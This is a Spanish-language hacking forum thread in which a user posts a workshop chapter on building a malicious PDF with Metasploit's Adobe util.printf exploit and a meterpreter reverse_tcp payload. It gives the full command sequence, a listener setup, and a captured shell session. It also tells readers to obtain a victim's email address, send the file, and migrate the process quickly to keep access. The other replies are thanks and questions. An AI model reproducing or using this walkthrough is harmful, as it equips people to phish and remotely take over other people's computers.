Página 1 de 1

[Taller]Pentest S.O. parte X

Publicado: 01 Ago 2010, 01:03
por shiva-sheva
+Temario
-+En que consiste el ataque del lado del cliente
-+Realizando ataque del lado del cliente
-+Creando el archivo .pdf maicioso
-+Escuchando la conexion
-+Capturando la conexion
-Conclusion
  • Bueno como ya hemos visto mucho metasploit
    y muchas tecnicas del mismo pues bueno mucha
    gente me a estado preguntando sobre como podemos
    infectar un pdf y eso veremos en esta parte del taller
    Es el famoso ataque del lado del cliente
+En que consiste el ataque del lado del cliente
  • Bueno esta tecnica consiste en infectar un .pdf
    que nosotros querramos con el fin de obtener
    acceso a su conputadora ya sea por red local
    o por internet....
+Realizando ataque del lado del cliente

  • Cargamos nuestro msf y despues vamos a
    configurar el ataque e infectar nuestri pdf veamos como

Código: Seleccionar todo

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME meteoritos.pdf
FILENAME => meteoritos.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(adobe_utilprintf) > set LPORT 51
LPORT => 51
msf exploit(adobe_utilprintf) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME meteoritos.pdf yes The file name.
OUTPUTPATH /shiva-sheva/metasploit/data/exploits yes The location of the file.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.1.108 yes The local address
LPORT 51 yes The local port


Exploit target:

Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)
+Creando el archivo .pdf maicioso
  • Bueno ya configurado todo podemos proceder
    a explotar que en este caso sera crear el .pdf
    malicioso veamos como ...

Código: Seleccionar todo

msf exploit(adobe_utilprintf) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'meteoritos.pdf' file...
[*] Generated output file /shiva-sheva/metasploit/data/exploits/meteoritos.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >
+Escuchando la conexion

  • Buenocomo ya lo vimos el handler nos permite escuchar
    conexiones que recibamos y bueno en este caso lo usaremos
    de nuevo y lo vamos a configurar para que podamos mandar el .pdf
    veamso como ....

Código: Seleccionar todo

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 51
LPORT => 51
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
  • Listo tenemos nuestro listener up ahora procedemos a mandar el
    .pdf malicioso jejej
    Bueno en estos pasos ustedes ingeniencelas para consegir el correo de la victima
    yo aconsejo bastante que primero lo practiquen en red local y despues
    pasen a algo mas dificil... Bueno supongamos que ya consigieron enviar el
    .pdf malicioso
+Capturando la conexion

  • Bueno si todo salio bien y ejecuto el .pdf malicioso nos saldra algo como esto....

Código: Seleccionar todo

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.1.108:51 -> 192.168.1.110:51)

meterpreter >
+Conclusion

  • Vemos que tenemos muchos metodos efectivos para poder
    introducirnos en un sistema jejej ahora consejo que si usan
    .pdf migren el proceso rapido para no perder la conexion ok?
    Y bueno hasta aqui llegamos ala parte 10 del pentest
    apoyandonos en metasploit y en los capitulos que sigen
    usaremos una herramienta muy util llamada SET
    (Social Enginer Toolkit) Para que vayan leiendo un poco
    y nos familiarisemos y bueno nos tomaremos un descanzo
    como de una semana para que puedan repasar el taller y
    poder continuar saludos a todos!

Re: [Taller]Pentest S.O. parte X

Publicado: 06 Ago 2010, 08:36
por gandar
Que ganas shiva-sheva! Te felicito por eso y por tu amplio conocimiento, espero con ansias el próximo capitulo. Desde ya muchísimas gracias!

Re: [Taller]Pentest S.O. parte X

Publicado: 13 Ago 2010, 15:56
por _Wil_
hola shiva...

Pues ahi recien checaba tus post =S habia estado un cacho ausente por aca... es muy interesante lo q posteas gracias x la info...

oye sabes si el problema del acroba reader con los pdf q le daba vida a este xploit fue parchado ya? es q estas vulnerabilidades vienen y se van rrapido :( ....

Re: [Taller]Pentest S.O. parte X

Publicado: 10 Nov 2010, 17:14
por el_sebas
Excelente aporte....Muy detallado y se entiende al 100%
Muchisimas gracias por compartir.....

Re: [Taller]Pentest S.O. parte X

Publicado: 10 Nov 2010, 17:19
por Skillmax
el_sebas escribió:Excelente aporte....Muy detallado y se entiende al 100%
Muchisimas gracias por compartir.....

Vie Ago 13, 2010 2:56 pm

Re: [Taller]Pentest S.O. parte X

Publicado: 12 Nov 2010, 08:38
por b4nz0k
Exelente!!!!!
Muy Bueno Gracias , me sirvio de mucho :D!!

Re: [Taller]Pentest S.O. parte X

Publicado: 24 Mar 2014, 00:34
por minari02
Hola, disculpad que reviva un tema tan antiguo, de casualidad alguien tendra los videos del taller?
Gracias.

Re: [Taller]Pentest S.O. parte X

Publicado: 25 Mar 2014, 12:49
por kernel_32
alguien sabe porque le han baneado?